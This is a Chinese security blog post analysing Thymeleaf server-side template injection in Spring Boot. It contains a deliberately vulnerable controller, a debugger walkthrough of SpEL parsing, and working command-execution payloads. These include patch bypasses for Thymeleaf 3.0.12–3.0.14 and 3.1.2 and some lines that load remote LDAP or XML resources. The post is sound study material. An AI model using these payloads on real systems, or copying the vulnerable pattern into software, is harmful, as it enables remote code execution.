<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@GetMapping(&quot;hello&quot;)</span></span><br><span class="line"><span class="keyword">public</span> String <span class="title function_">show1</span><span class="params">(Model model)</span> &#123;</span><br><span class="line">    model.addAttribute(<span class="string">&quot;msg&quot;</span>, <span class="string">&quot;Hello World&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;index&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这时候 return “index”，相当于~{index.html}，跟调用了fragment标签的效果是一样的。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>TestController 用于制造漏洞环境</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test.controller.vul;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.springframework.stereotype.Controller;</span><br><span class="line"><span class="keyword">import</span> org.springframework.ui.Model;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.GetMapping;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.PathVariable;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.PostMapping;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.RequestParam;</span><br><span class="line"></span><br><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestController</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@PostMapping(&quot;/vul0&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">vul0</span><span class="params">(<span class="meta">@RequestParam</span> String payload)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> payload;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*payload: __$&#123;new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;).getInputStream(),&quot;GBK&quot;).useDelimiter(&quot;asdasdasd&quot;).next()&#125;__::.x   */</span></span><br><span class="line">    <span class="comment">/*发现这样也行：__$&#123;new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;).getInputStream(),&quot;GBK&quot;).useDelimiter(&quot;asdasdasd&quot;).next()&#125;__::*/</span></span><br><span class="line">    <span class="comment">/*最后发现，只要有__$&#123;&#125;__::，或::__$&#123;&#125;__，或者把$替换成*，都是能够利用 */</span></span><br><span class="line">    <span class="meta">@PostMapping(&quot;/vul1&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">vul1</span><span class="params">(<span class="meta">@RequestParam</span> String payload, Model model)</span> &#123;</span><br><span class="line">        model.addAttribute(<span class="string">&quot;name&quot;</span>, <span class="string">&quot;baka&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;test/&quot;</span>+payload+<span class="string">&quot;/ttt&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@PostMapping(&quot;/vul2&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">vul2</span><span class="params">(<span class="meta">@RequestParam</span> String payload)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> payload+<span class="string">&quot;::unsafe&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@PostMapping(&quot;/vul3&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">vul3</span><span class="params">(<span class="meta">@RequestParam</span> String payload)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;index::&quot;</span> + payload;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping(&quot;/vul4/&#123;payload&#125;&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">vul4</span><span class="params">(<span class="meta">@PathVariable</span> String payload)</span> &#123;</span><br><span class="line">        System.out.println(payload);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>这里要注意一点，如果是GET传参，需要URL编码，否则在tomcat9.x中会报错，不支持&amp;_等字符：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584242841.png"  alt="img"></p>
<p>payload一般用这个就行：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__$&#123;<span class="keyword">new</span> <span class="title class_">java</span>.util.Scanner(T(java.lang.Runtime).getRuntime().exec(<span class="string">&quot;calc&quot;</span>).getInputStream(),<span class="string">&quot;GBK&quot;</span>).useDelimiter(<span class="string">&quot;asdasdasd&quot;</span>).next()&#125;__::.x</span><br></pre></td></tr></table></figure>

<p>但是&#x2F;vul4 我一直测试失败，跟进发现是解析表达式时，没有找到{，因为当时还是URL编码形式，后面会讲。</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>本质是SPEL，先看最终调用点：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584261582.png"  alt="img"></p>
<p>这个调用和之前学习SPEL时是一模一样的。</p>
<p>那现在的问题是，为什么能够进入SPEL解析。之前学习SPEL注入时，我们的定界符用的是#{}，为什么到这里就变成__${}__这种了呢？用#行不行？为什么要有 __:: 这种？这些都是后面要搞清楚的问题。</p>
<p>首先来看一张图：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584261611.png"  alt="img"></p>
<p>这张图在学习内存马的时候也出现过，对我们理解spring如何处理一个请求并回显有很大帮助。后面分析时，可以时不时回头看一眼。</p>
<p>当我们想自己调试时，可以在Runtime.exec这种命令执行点，或者com.test.controller.vul.TestController#vul1 这种业务处理点下断点，这样就能够大致了解完整的调用栈，方便我们分析参数是如何传递的。</p>
<p>不过这里，我直接跟着网上文章分析，但是<strong>从后往前</strong>，即先看里漏洞触发最近的方法。</p>
<p>首先要知道，一个请求最终都会走到org.springframework.web.servlet.DispatcherServlet#doDispatch，里面有三个重要方法。</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584279122.png"  alt="img"></p>
<p>下面的分析都基于&#x2F;vul1</p>
<h2 id="processDispatchResult漏洞触发"><a href="#processDispatchResult漏洞触发" class="headerlink" title="processDispatchResult漏洞触发"></a>processDispatchResult漏洞触发</h2><p>先在org.springframework.web.servlet.DispatcherServlet#processDispatchResult打断点，走到render：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/1760518496363-a6f20473-d2f9-4cb9-b878-92e7db305157.png"  alt="img"></p>
<p>这里已经被controller处理过了，view就是返回的视图名称，model就是我们自己addAttribute的内容。</p>
<p>跟进render：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584279117.png"  alt="img"></p>
<p>先对视图处理，获取view对象。继续往下：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584279097.png"  alt="img"></p>
<p>这里拿刚刚获取的view对象进行进一步的渲染，跟进，直到renderFragment：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584288651.png"  alt="img"></p>
<p>这里getTemplateName获取的值是test&#x2F;…..&#x2F;ttt，这就是我们在controller里返回的。这里能证实，返回的内容，就是会被当作模板解析，跟~{xxx}的效果是一样的。继续往下：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584288625.png"  alt="img"></p>
<p>首先看上面的if，判断有没有双冒号，这就是为什么我们payload里要加双冒号的原因。其实双冒号只需要加在__${}__外的任何地方都行。其次，看到下面的~{ + … + } 。这再次印证了，controller里return的内容，会被作为fragment处理。</p>
<p>然后会产生两个分支。</p>
<h3 id="分支1"><a href="#分支1" class="headerlink" title="分支1"></a>分支1</h3><p>跟进parseExpression：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584295930.png"  alt="img"></p>
<p>这里跟进preprocess：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584295969.png"  alt="img"></p>
<p>这里有个很重要的操作，获取两个双下划线内的值，最后获取的就是${xxx}：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584295952.png"  alt="img"></p>
<p>跟进parseExpression：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584295943.png"  alt="img"></p>
<p>然后跟进parse：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584303220.png"  alt="img"></p>
<p>然后跟进decompose：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584303215.png"  alt="img"></p>
<p>直到进入org.thymeleaf.standard.expression.ExpressionParsingUtil#decomposeSimpleExpressions，这里第一次会进入这个if：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584303238.png"  alt="img"></p>
<p>判断第一个字符是不是$, *, #, @, ~，第二个字符是不是{ 。接下来就是一直往currentFragment里添加，直到遇见}，进入这个if：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584315680.png"  alt="img"></p>
<p>这里应该进入第一个case，跟进：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584315651.png"  alt="img"></p>
<p>这里也是很重要的操作，把${}里的内容取出了，这样的话，表达式就跟学SPEL时一样了。</p>
<p>同时，能发现这里还有一个if，会取出{}里的内容，所以payload也可以写成：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__$&#123;&#123;<span class="keyword">new</span> <span class="title class_">java</span>.util.Scanner(T(java.lang.Runtime).getRuntime().exec(<span class="string">&quot;calc&quot;</span>).getInputStream(),<span class="string">&quot;GBK&quot;</span>).useDelimiter(<span class="string">&quot;asdasdasd&quot;</span>).next()&#125;&#125;__::.x</span><br></pre></td></tr></table></figure>



<p>这里补充一下，__<em>{}<strong>形式的payload也是可以的，因为里面的解析步骤跟${}时一样。而其他的就不行了，因为解析时好像会根据()来切片，最终payload全乱了，可以自己跟进调试一下。</strong></em>{}__也许能用来绕waf。</p>
<p>回到preprocess方法，最终会在excute实现表达式解析：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584323692.png"  alt="img"></p>
<p>可以看一眼调用栈：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584323717.png"  alt="img"></p>
<h3 id="分支2"><a href="#分支2" class="headerlink" title="分支2"></a>分支2</h3><p>有时候，我们的payload中可以没有双下划线。比如访问&#x2F;vul2，此时payload&#x3D;${new+java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(“calc”).getInputStream(),”GBK”).useDelimiter(“asdasdasd”).next()}</p>
<p>这时候进入preprocess时，由于没有找到下划线，会直接返回input：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584333290.png"  alt="img"></p>
<p>在decompose的时候会进入最后一个case，从而把fragment和selector分离：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584333297.png"  alt="img"></p>
<p>接着回到renderFragment，会进入FragmentExpression.createExecutedFragmentExpression(context, fragmentExpression); ：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584333293.png"  alt="img"></p>
<p>跟进到org.thymeleaf.standard.expression.FragmentExpression#doCreateExecutedFragmentExpression：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584343160.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584343090.png"  alt="img"></p>
<p>这里会分别获取templateName和selector，并执行表达式解析。</p>
<p>所以payload里有时候也可以不带双下划线。</p>
<h2 id="applyDefaultViewName漏洞触发"><a href="#applyDefaultViewName漏洞触发" class="headerlink" title="applyDefaultViewName漏洞触发"></a>applyDefaultViewName漏洞触发</h2><p>这里会触发url路径中的payload。</p>
<p>跟进getDefaultViewName，再跟进getViewName，再跟进transformPath：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584343025.png"  alt="img"></p>
<p>这里会去掉path头尾的&#x2F;，以及扩展名，即最后一个. 后面的内容，这就是为什么要加上 .x ，否则payload就乱了。但是就&#x2F;vul4 情况一定要加 .x 其他就随便了。</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584354547.png"  alt="img"></p>
<p>回到applyDefaultViewName，之后就是往mv里设置处理过的viewName了。再后面就会调用processDispatchResult。跟上面的过程就一样了。所以关键是mv对象中的viewName是什么。</p>
<p>然而，这里有一个问题：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584354587.png"  alt="img"></p>
<p>就是要提取${}里面的内容时，{ 还是URL编码，导致无法正常取出，这样返回的还是原本的input，从而触发不了。似乎是springboot版本的问题，2.7.15不行，但是2.5.3可以。<strong>2.6及以下的好像才行</strong>。</p>
<p>调试了一下：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584354640.png"  alt="img"></p>
<p>两个版本走的if不一样，导致了解析差异。而为什么有差异，我还不清楚。</p>
<h2 id="ha-handle"><a href="#ha-handle" class="headerlink" title="ha.handle"></a>ha.handle</h2><p>这里主要是获取controller的返回值，然后设置到mavContainer里，最后再从里面获取，文章里写的很清楚了，这里不赘述。</p>
<h2 id="无法利用的情况"><a href="#无法利用的情况" class="headerlink" title="无法利用的情况"></a>无法利用的情况</h2><p>如果用@RestController或者给Controller加上@ResponseBody就失去了视图渲染功能，就不会触发漏洞</p>
<h1 id="回显问题"><a href="#回显问题" class="headerlink" title="回显问题"></a>回显问题</h1><p>这里的回显依靠异常抛出，所以对springboot版本有限制：</p>
<p>在低版本的 springboot (&lt;&#x3D; 2.2) 中, <code>server.error.include-message</code> 的默认值为 <code>always</code>, 这使得默认的 500 页面会显示异常信息</p>
<p>但是在高版本的 springboot (&gt;&#x3D; 2.3) 中, 上述选项的默认值变成了 <code>never</code>, 那么 500 页面就不会显示任何异常信息</p>
<p>所以想要复现的话，得在配置文件里改一下：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">server:</span></span><br><span class="line">  <span class="attr">port:</span> <span class="number">8084</span></span><br><span class="line">  <span class="attr">error:</span></span><br><span class="line">    <span class="attr">include-message:</span> <span class="string">always</span></span><br><span class="line"><span class="attr">spring:</span></span><br><span class="line">  <span class="attr">thymeleaf:</span></span><br><span class="line">    <span class="attr">cache:</span> <span class="literal">false</span></span><br></pre></td></tr></table></figure>

<p><strong>${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(“ipconfig”).getInputStream()).next()}</strong>::1</p>
<p>这里双冒号后面得加内容，才能回显出来</p>
<h1 id="补丁绕过"><a href="#补丁绕过" class="headerlink" title="补丁绕过"></a>补丁绕过</h1><p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/413661.html" >https://www.freebuf.com/vuls/413661.html<i class="fas fa-external-link-alt"></i></a></p>
<p>看这篇文章里的吧，写的很详细，我这里就只记录一下payload</p>
<h2 id="3-0-12"><a href="#3-0-12" class="headerlink" title="3.0.12"></a>3.0.12</h2><p><strong>%24%7b%00new+java.util.Scanner(T+(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d</strong></p>
<h2 id="3-0-13"><a href="#3-0-13" class="headerlink" title="3.0.13"></a>3.0.13</h2><p>%24%7b%00new+java.util.Scanner(%00T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d</p>
<h2 id="3-0-14"><a href="#3-0-14" class="headerlink" title="3.0.14"></a>3.0.14</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__$||&#123;&#x27;&#x27;.getClass().forName(&#x27;java.lang.Runtime&#x27;).getMethod(&#x27;exec&#x27;,&#x27;&#x27;.getClass()).invoke(&#x27;&#x27;.getClass().forName(&#x27;java.lang.Runtime&#x27;).getMethod(&#x27;getRuntime&#x27;).invoke(null),&#x27;open -a calculator.app&#x27;)&#125;__::</span><br></pre></td></tr></table></figure>



<p>3.0.15后暂时无绕过</p>
<p>这里还有一个可以看看：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584369818.png"  alt="img"></p>
<h2 id="3-1-2"><a href="#3-1-2" class="headerlink" title="3.1.2"></a>3.1.2</h2><p>参考：<a class="link"   target="_blank" rel="noopener" href="https://xz.aliyun.com/news/14196" >https://xz.aliyun.com/news/14196<i class="fas fa-external-link-alt"></i></a></p>
<p>这里先记录payload：可以直接写到html页面里加载，适用于能文件上传写模板的时候；也可以像上面一样打，记得URL编码</p>
<p>直接写入html模板，相当于：</p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584378118.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584378101.png"  alt="img"></p>
<p><img   src="https://1diot9-github-io.oss-cn-beijing.aliyuncs.com/img/image-1760584378111.png"  alt="img"></p>
<p>上面的两张图片，大致解释了为什么要用[[]]或者[()]包裹，具体还是没搞明白。</p>
<p>[[]] &#x3D; th:text   [()] &#x3D; th:utext</p>
<p>这个好像叫内联表达式，在realworldCTF chatterbox里出现过，能够绕过&lt;&gt;等符号</p>
<p>1、ch.qos.logback.core.util.OptionHelper</p>
<p>[[${T(ch.qos.logback.core.util.OptionHelper).instantiateByClassName(“org.springframework.expression.spel.standard.SpelExpressionParser”,””.getClass().getSuperclass(),T(ch.qos.logback.core.util.OptionHelper).getClassLoader()).parseExpression(“T(java.lang.String).forName(‘java.lang.Runtime’).getRuntime().exec(‘whoami’)”).getValue()}]]</p>
<p>2、com.zaxxer.hikari.HikariConfig</p>
<p>[[${New com.zaxxer.hikari.HikariConfig().setMetricRegistry(“ldap:&#x2F;&#x2F;127.0.0.1:1389”)}]]</p>
<p>3、com.zaxxer.hikari.util.UtilityElf</p>
<p>[[${T(com.zaxxer.hikari.util.UtilityElf).createInstance(“org.springframework.context.support.ClassPathXmlApplicationContext”,””.getClass().forName(“org.springframework.context.support.ClassPathXmlApplicationContext”),”<a class="link"   target="_blank" rel="noopener" href="http://ip/poc.xml%22)%7D]]" >http://ip/poc.xml&quot;)}]]<i class="fas fa-external-link-alt"></i></a></p>
<p>高版本jdk jshell：</p>
<p>[[${T(org. apache.tomcat.util.IntrospectionUtils).callMethodN(T(com.zaxxer.hikari.util.UtilityElf).createInstance(‘jakarta.el.ELProcessor’, T(ch.qos.logback.core.util.Loader).loadClass(‘jakarta.el.ELProcessor’)), ‘eval’, new java.lang.String[]{‘“”.getClass().forName(“jdk.jshell.JShell”).getMethods()[6].invoke(“”.getClass().forName(“jdk.jshell.JShell”)).eval(“java.lang.Runtime.getRuntime().exec(&quot;calc&quot;)”)’}, T(org. apache.el.util.ReflectionUtil).toTypeArray(new java.lang.String[]{“java.lang.String”}))}]]</p>
<p>4、com.fasterxml.jackson.databind.util.ClassUtil</p>
<p>[[${T(com.fasterxml.jackson.databind.util.ClassUtil).createInstance(“”.getClass().forName(‘org.spr’+’ingframework.expression.spel.standard.SpelExpressionParser’),true).parseExpression(“T(java.lang.String).forName(‘java.lang.Runtime’).getRuntime().exec(‘calc’)”).getValue()}]]</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>学到的新知识有</p>
<p>1、只要有__${}<strong>::，或::</strong>${}__，或者把$替换成*，都是能够利用</p>
<p>2、Url路径里的payload，只能在springboot &lt;&#x3D; 2.6 时生效</p>
<p>3、payload里为什么有时候能不写双下划线</p>
<p>4、初步认识了springboot是怎么渲染模板的</p>
<p>5、回显的局限性</p>
<p>6、内联表达式的运用</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a class="link"   target="_blank" rel="noopener" href="https://www.qwesec.com/2025/02/thymeleafSSTI.html" >https://www.qwesec.com/2025/02/thymeleafSSTI.html<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/" >https://godownio.github.io/2025/04/28/java-thymeleaf-ssti-spel/<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/413661.html" >https://www.freebuf.com/vuls/413661.html<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://xz.aliyun.com/news/14196" >https://xz.aliyun.com/news/14196<i class="fas fa-external-link-alt"></i></a></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://clowsman.github.io/2024/12/14/%E5%86%8D%E7%9C%8BThymeleaf/index.html" >https://clowsman.github.io/2024/12/14/%E5%86%8D%E7%9C%8BThymeleaf/index.html<i class="fas fa-external-link-alt"></i></a></p>
<p>[<a class="link"   target="_blank" rel="noopener" href="https://boogipop.com/2024/01/29/RealWorld%20CTF%206th%20%E6%AD%A3%E8%B5%9B_%E4%BD%93%E9%AA%8C%E8%B5%9B%20%E9%83%A8%E5%88%86%20Web%20Writeup/]" >https://boogipop.com/2024/01/29/RealWorld%20CTF%206th%20%E6%AD%A3%E8%B5%9B_%E4%BD%93%E9%AA%8C%E8%B5%9B%20%E9%83%A8%E5%88%86%20Web%20Writeup/]<i class="fas fa-external-link-alt"></i></a>(<a class="link"   target="_blank" rel="noopener" href="https://boogipop.com/2024/01/29/RealWorld" >https://boogipop.com/2024/01/29/RealWorld<i class="fas fa-external-link-alt"></i></a> CTF 6th 正赛_体验赛 部分 Web Writeup&#x2F;)</p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                Thymeleaf SSTI
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2025/10/16/Thymeleaf-SSTI/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">1diot9</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2025-10-16 11:09</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/10/21/ISCC2025%E7%BA%BF%E4%B8%8B%E8%B5%9B-localSnake/"
                                   title="ISCC2025线下赛-localSnake"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">ISCC2025线下赛-localSnake</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/10/14/SPEL/"
                                   title="SPEL"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">SPEL</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">基本用法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">4.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#processDispatchResult%E6%BC%8F%E6%B4%9E%E8%A7%A6%E5%8F%91"><span class="nav-number">4.1.</span> <span class="nav-text">processDispatchResult漏洞触发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%94%AF1"><span class="nav-number">4.1.1.</span> <span class="nav-text">分支1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%94%AF2"><span class="nav-number">4.1.2.</span> <span class="nav-text">分支2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#applyDefaultViewName%E6%BC%8F%E6%B4%9E%E8%A7%A6%E5%8F%91"><span class="nav-number">4.2.</span> <span class="nav-text">applyDefaultViewName漏洞触发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ha-handle"><span class="nav-number">4.3.</span> <span class="nav-text">ha.handle</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E6%B3%95%E5%88%A9%E7%94%A8%E7%9A%84%E6%83%85%E5%86%B5"><span class="nav-number">4.4.</span> <span class="nav-text">无法利用的情况</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9E%E6%98%BE%E9%97%AE%E9%A2%98"><span class="nav-number">5.</span> <span class="nav-text">回显问题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E4%B8%81%E7%BB%95%E8%BF%87"><span class="nav-number">6.</span> <span class="nav-text">补丁绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-12"><span class="nav-number">6.1.</span> <span class="nav-text">3.0.12</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-13"><span class="nav-number">6.2.</span> <span class="nav-text">3.0.13</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-14"><span class="nav-number">6.3.</span> <span class="nav-text">3.0.14</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-2"><span class="nav-number">6.4.</span> <span class="nav-text">3.1.2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">8.</span> <span class="nav-text">参考</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
